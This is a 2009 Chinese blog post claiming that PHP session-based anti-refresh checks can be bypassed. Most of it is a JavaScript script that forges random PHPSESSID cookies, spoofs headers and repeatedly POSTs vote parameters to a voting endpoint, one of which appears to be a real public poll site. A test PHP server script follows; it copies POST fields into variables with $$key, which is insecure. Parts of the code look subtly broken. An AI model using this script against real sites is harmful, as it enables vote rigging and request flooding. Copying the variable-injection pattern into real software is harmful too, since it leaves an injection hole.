[PHP]php的sessionid可以伪造，不要用来做防刷新处理_web3der

http://blog.sina.com.cn/u/1617299271

首页博文目录关于我

个人资料

微博

加好友发纸条

写留言加关注

博客等级：
博客积分：

博客访问：
关注人气：
获赠金笔：0支
赠出金笔：0支
荣誉徽章：

正文字体大小：大中小

[PHP]php的sessionid可以伪造，不要用来做防刷新处理

(2009-07-04 18:00:19)

标签：

xmlhttp

cookie

if

document

杂谈

如果是基于session或者cookie做防止刷新，那么，我可以伪造状态，用xmlhttp把服务器刷爆代码如下，服务器端的代码在最后一个textarea里.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title> xmlhttp</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script language="javascript" type="text/javascript" src="fckXML.js"></script>
<script language="javascript" type="text/javascript">
<!--

function SetCookie(sName, sValue)
{
date = new Date();
document.cookie = sName + "=" + escape(sValue) + "; expires=" + date.toGMTString();
}

if ( window.XMLHttpRequest ) // Gecko
oXmlHttp = new XMLHttpRequest() ;
else if ( window.ActiveXObject ) // IE
oXmlHttp = new ActiveXObject("MsXml2.XmlHttp") ;

urlToCall = "http://toupiao.scol.com.cn/toupiao_save.asp";
urlToCall = "http://develop-3/test/jstest/xmlhttp/server.php";
urlToCall = "http://test.bai.com/jstest/xmlhttp/server.php";
host = "test.bai.com";
var bAsync = 1 ;
result = '';
i = 1;
n = 2;
function zuobiStart()
{
//打开url
oXmlHttp.open( "POST", urlToCall, bAsync ) ;

//伪造ssessionid 欺骗服务器，服务器的本次会话session就重新置换了,所有的session就失去意义了。
phpsessid = Math.random();
id2 = Math.random();
phpsess = phpsessid.toString()+'11111'+id2.toString();
phpsess = phpsess.replace( /\./g,"0" );
phpsess = phpsess.substr( 0,32 );
cook ="PHPSESSID="+phpsess+"; ";

//设置PHPSESSID,由于php的session依靠cookie来实现，所以这样就实现了本次会话session的刷新
document.cookie=cook;

//以下是可以修改的头
oXmlHttp.setRequestHeader ( "ADDR000", 'test' );
oXmlHttp.setRequestHeader ( "User-Agent", "Mozilla/4.0 " );
oXmlHttp.setRequestHeader( "accept-language", "zh_cn");
oXmlHttp.setRequestHeader( "CONTENT-TYPE","application/x-www-form-urlencoded");
oXmlHttp.setRequestHeader( "accept-encoding", "gzip, deflate");
oXmlHttp.setRequestHeader( "CONNECTION", "keep-alive");
oXmlHttp.setRequestHeader( "accept", "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");

//以下是不可以修改的头,改了服务器也不认
oXmlHttp.setRequestHeader( "Referer", 'example.test.com');
oXmlHttp.setRequestHeader ("Cookie", cook);
oXmlHttp.setRequestHeader ("HOST", host );
oXmlHttp.setRequestHeader( "content-length", "11");
oXmlHttp.setRequestHeader( "CACHE_CONTROL", "kcache");

params = 'item_button=45&topic=5';
//发送测试结果
oXmlHttp.send(params) ;
//测试返回结果
oXmlHttp.onreadystatechange = function()
{
  if ( oXmlHttp.readyState == 4 )
  {
   result += oXmlHttp.responseText;
  }
}
//
i++;
//跳出循环
if (i>n){
  //alert("end\n"+i.toString()+"\n"+n.toString());
  infoObj = document.getElementByIdx('info');
  infoObj.value = result;
  //info.value = result+"慰问慰问";
  clearInterval(flushtimerID);
}
}//end func
//结束

flushtimerID = window.setInterval(zuobiStart,100);

//-->
</script>
</head>

<body>

<?php
require_once('echo.php');
session_start();

//pr($_COOKIE);pr($_GET);pr($_POST);
//pr($_SESSION);pr($_COOKIE);

if ( $_SESSION['posted'] == 1 ) {
echo"error";
DIE;
}

//get cookie number
$num = $_COOKIE['currNum'];
$expires = time()+60*60*24*365;
if (!isset($_COOKIE['currNum'])) {
setcookie('currNum' , 1 , $expires );
echo "cookie没有设置\n";
}
else {
$num++;
setcookie('currNum',$num);
echo $num;
}
?>
<style type="text/css">
*{font:12px verdana;}
</style>
<pre>
<?php
foreach ($_POST as $key=>$v) {
$$key = $v;
$str .=$v."\r\n";
//echo "$v \n";
}
//print_R($_SERVER);
foreach ($_SERVER as $k=>$v) {
$str .=$k."=".$v."\n";
}

echo $str;

$fp = fopen("d:/tmp/".$num.".txt","wb");
//fwrite($fp,$str);
fclose($fp);

$_SESSION['posted'] = 1;

阅读┊ 收藏 ┊ 喜欢 ▼ ┊打印┊举报/Report

前一篇：allow_url_fopen与安全以及PHP libcurl

后一篇：几种设为首页的代码

新浪BLOG意见反馈留言板　欢迎批评指正